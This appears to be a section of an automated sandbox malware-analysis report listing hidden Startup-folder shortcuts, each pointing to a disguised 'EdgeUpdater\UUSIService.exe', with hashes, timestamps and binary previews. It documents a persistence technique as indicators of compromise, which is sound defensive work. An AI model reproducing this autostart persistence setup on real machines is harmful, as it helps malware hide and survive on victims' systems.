Preview:	L..................F...."............k.&....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b798218a8d5c440bb17c1a50108ec71b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:06 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.930635289958991
Encrypted:	false
SSDEEP:	24:8ZsHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8GHfNDp2l9tJRBzfNZ47/yg
MD5:	AB6FF41E18492D2D814210FD6048B073
SHA1:	0E9BF8ADFAE2CF0780959E04B601F2EDD13582C4
SHA-256:	813AA91CA854DDD6230900339974E763B58C23B00B59B54DCE06DF022142B932
SHA-512:	5DA8B8F19FCEA821026B1DC924895BB26FBF6187A87596248EAA05B8757E27FF0276F8ECDFBFC4FA4951BB64538143883C635DDF8BBD951820F9098711E14F7C
Malicious:	false
Preview:	L..................F...."...........{k......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_bcbe81260e294175b6144b9088d204e9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:15 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.91565033862321
Encrypted:	false
SSDEEP:	24:8ZY+HoDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8S+HoDp2l9tJRBzfNZ47/yg
MD5:	2F065B8C57199DC622712F96F8DF7FDB
SHA1:	7EED8F12B96858FE3882638E8B99CBD6306A4D08
SHA-256:	CA663F0EE1FF0FBF5488A42118F84276553B17C8DDC478F41E020F71CDCC79F7
SHA-512:	F684A341F5E2C431C1DF3538022B6F48057A3B00369B172845D6592D578036094636556205BF138CBD9D50A999387BBCC8803942EAC2862D52E7E4CFFDD7EC44
Malicious:	false
Preview:	L..................F...."............4.B....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........3..B........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_be6a07612abb41949afd68049a21708e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:25 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.91750086029815
Encrypted:	false
SSDEEP:	24:8ZYHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8SHfNDp2l9tJRBzfNZ47/yg
MD5:	C6303455328D54F429F618A2A3273CB8
SHA1:	3F0C06B3439E60888D517034A3EC5F8CDD8E3161
SHA-256:	E982A27F5EC16151B5B6109B0AE902AA4C0114433C73279A535A54E6D41063E1
SHA-512:	4B7D77B393D0E27B5F833B49ACCC174DB6DB7D0EFC123DAA4E0A9BB1BD4495517388F5DB088BC1537684ACEC81ABD172F0A052C7C447C7109A18FF266324A255
Malicious:	false
Preview:	L..................F...."..............%....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c21e90becac149bc9e247673ad530369.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:33 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.919576524701161
Encrypted:	false
SSDEEP:	24:8ZZhH6Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8ZH6Dp2l9tJRBzfNZ47/yg
MD5:	DAB0476224C8E5240B3E70A7CF2AF190
SHA1:	14B25B6A789FFAFA5B1D25DAEFF23AE38FA583DB
SHA-256:	50B5A706044700BCEE803EAAF1B422395EF31209013CA308A91DA3784ACD9D7D
SHA-512:	34E611166A1AAED32FC07043F3909B9AE66FC68CB8D94B7E588E2E230139A16211909B3F3E9EEC5151DD262FA64FED3187EB69D012969C8C8425C6E93F62EB64
Malicious:	false
Preview:	L..................F...."............-\|M....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............N........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c2ebe0361535455e8788ff8a6bc522ba.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:36 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924602387550799
Encrypted:	false
SSDEEP:	24:8Z+8WHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8SHfNDp2l9tJRBzfNZ47/yg
MD5:	4C8F190E8A6806345BF0AEB9ACE378D3
SHA1:	E2BDDD28AE324E0EB482E558DAA49058A54A065A
SHA-256:	E936CB0B6E5F9C6B70DC1AF563005816DD166951FD721768218D9DA809CD9B53
SHA-512:	D7AD9BB15C532E6EF60C65E3DAAFB599B56367875BE1F2136720F82574779232E9069EBF480AB8BBDDB920C456A39D8243605B101E9C98EAEE11E6DFDDD35620
Malicious:	false
Preview:	L..................F...."...........__6+....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c355178b7b7f40a1947b66c7cd8f0d74.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:44 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923177958062729
Encrypted:	false
SSDEEP:	24:8ZMHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8+HfNDp2l9tJRBzfNZ47/yg
MD5:	3DE40A26CD1C54B2BD323792B3079B3D
SHA1:	8DBF33325ACF3181D18FB881BB60F2055CF694A1
SHA-256:	5B11809E2912F2256E601779D97E8B44876481A28B9DDACEA6F6775BB1F564E7
SHA-512:	75EE9389DB9483D05A634A9A92E57A8AD064CED85B4925AFD4D270227C6AAD89BFADB302BF894FCF0060F0E3972A22AA4163C0957FAE643591CD83B5F7F701D2
Malicious:	false
Preview:	L..................F...."...........%`(0....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c3dbe5644a5b4d48b1fb6491c311eced.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:29 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9227719445422355
Encrypted:	false
SSDEEP:	24:8Z2wHvVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8FHdDp2l9tJRBzfNZ47/yg
MD5:	86727407F6E9357CF4DB34F4400BE8AC
SHA1:	E9FA0A6A4E652EDBCCE83F3BDFADF11979FC0B77
SHA-256:	AA4B35BC584BDF074B1D6958E6F7FFA38FE947A8046CFB6C155DAFDF2D5D5A59
SHA-512:	A5B402AB828A0E7E5B8F4DE5B332B369EB98B494E0FED6225078D71EFC9EC999170435971983850F2FC25E96226424E2F4763AB688F3C2190C087D842778DD29
Malicious:	false
Preview:	L..................F...."............K.J....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+4.I........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c3f1eba03716492eb11b6423860b4f68.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:28 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.918248356054497
Encrypted:	false
SSDEEP:	24:8ZzHvVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8lHdDp2l9tJRBzfNZ47/yg
MD5:	B7274446F668016F88E279D33BC95382
SHA1:	4BCB69753F4109E67500296ACD691CED74E34D47
SHA-256:	BDE7BC2A4855802D28100D9688B36DEF33C70885B9A2A0370C8DF09E3D18B663
SHA-512:	826A65246A3B183481D41B2B7CEB0B155A44976A994D2603DC7E0A2493D1A14D94E85CED52010F2FD6A107D1CBC8FF491143CB6CC9E1A1C4CDFA96C0D17FF9E6
Malicious:	false
Preview:	L..................F....".............SJ....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+4.I........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c59d4cba3ad84ff7a7f949314e21efd4.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:53 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924729689323938
Encrypted:	false
SSDEEP:	24:8ZgHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:86HfNDp2l9tJRBzfNZ47/yg
MD5:	B4CF63CF375233EB48EC573F04534C85
SHA1:	918E80552AD3F1BFAF5986C29CD04EE762B1FE48
SHA-256:	80F011DE873DEA1BF8B3FE3C7F8F8D55CF79FE0B131E3C65F5C42EBC37743863
SHA-512:	90ECE84C26BEBECF76A2E821E98AD3A073215A4AC1AE2C4E7FBF0545158D2771B7EBA2F0A0C328D90AD6BDE3687E89DE04B2C59B1A666BBEB755BE9B9EE54DA7
Malicious:	false
Preview:	L..................F...."..............5....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c6015a8a9597483d8296fda05e0c6cea.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:48 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.920835835180378
Encrypted:	false
SSDEEP:	24:8ZxHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8/HfNDp2l9tJRBzfNZ47/yg
MD5:	2864D10A799BA1443E6F3BBEEB36E712
SHA1:	3043FE545E4801334B2DBBC6B17FCE928C507EEA
SHA-256:	1A01F1C71B8E47B0042E35E6A1127E1862FB9058A817377DF77F7CE5AFED89C2
SHA-512:	9056CEFB34BEB6E90BCB2E45BE2D29DA6BAAB3FB1770535383BA02764C7B0657C478A182D2B4E1D4E0A2E16AA834A22E908C6F888A1A2A5D6ED11506CE9D6E98
Malicious:	false
Preview:	L..................F...."..............2....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c84fd3944e1a46079a937b9018946b61.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:06 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.921739080359588
Encrypted:	false
SSDEEP:	24:8ZIMHuDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8XHuDp2l9tJRBzfNZ47/yg
MD5:	BE5A9DADB631DCBB8F28B695D1728C92
SHA1:	B3F33EA80C53E6B88D9376475F7F4F53AC87F5D0
SHA-256:	B8DC27F4B689700F790A3B86256B45C56C83841B24B059BBB3E138D0410888FF
SHA-512:	BF3B7419CAB2B2A6EE549032F9FABA7E799F23A656F1D1287CDFB59B0869B1C2EEABD5DCCF5A4D281F890466BBF0E5CB12DE9A73489D6B64288D9E397D9E8602
Malicious:	false
Preview:	L..................F...."...........s.=....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........s.=........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c87d02d482fb4ca596a2fcc5e82e665e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:17 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925027615243238
Encrypted:	false
SSDEEP:	24:8ZAjHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8SjHfNDp2l9tJRBzfNZ47/yg
MD5:	ED738D05E8569E4DD5F1AD61DEE253AB
SHA1:	6EE8E8C8BF5D727D0601510B21B8F72A0674CF5D
SHA-256:	8D21AB948CA81031EC327592683BE39BEE7EDDB7DF6DEF3A440EDA9C0A9AEE78
SHA-512:	B2D19B0FDFDB15413A3C78C2623D97ABF291F46947BCDB07D4B774E0F07C94C34C5D223C4C1F963797EF89D369FDD53D6C88DFC2C6847FD03B49546AF956AA73
Malicious:	false
Preview:	L..................F....".............c ....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cb59e031b1c64307ba171c4ec71031e6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:23 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927401182205491
Encrypted:	false
SSDEEP:	24:8ZYqLHVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8NHVDp2l9tJRBzfNZ47/yg
MD5:	AC80C416EC3EBA6764EF1189F16F38D5
SHA1:	755F6A87DD9E1430DEE895AD136FBC94BB7AA81E
SHA-256:	672AE2689D8D2C15D5496CD2587973021B58FF2E31251E38F5F6B1878F295DEC
SHA-512:	25965BEF3A18A397E689FDFF21683FD4ACE5DAD578DD9EFE595ECA9B12170B10916F166615D9C402545A6B8324FF593AF5D510DC7020489C8FB2B23B47E15DFB
Malicious:	false
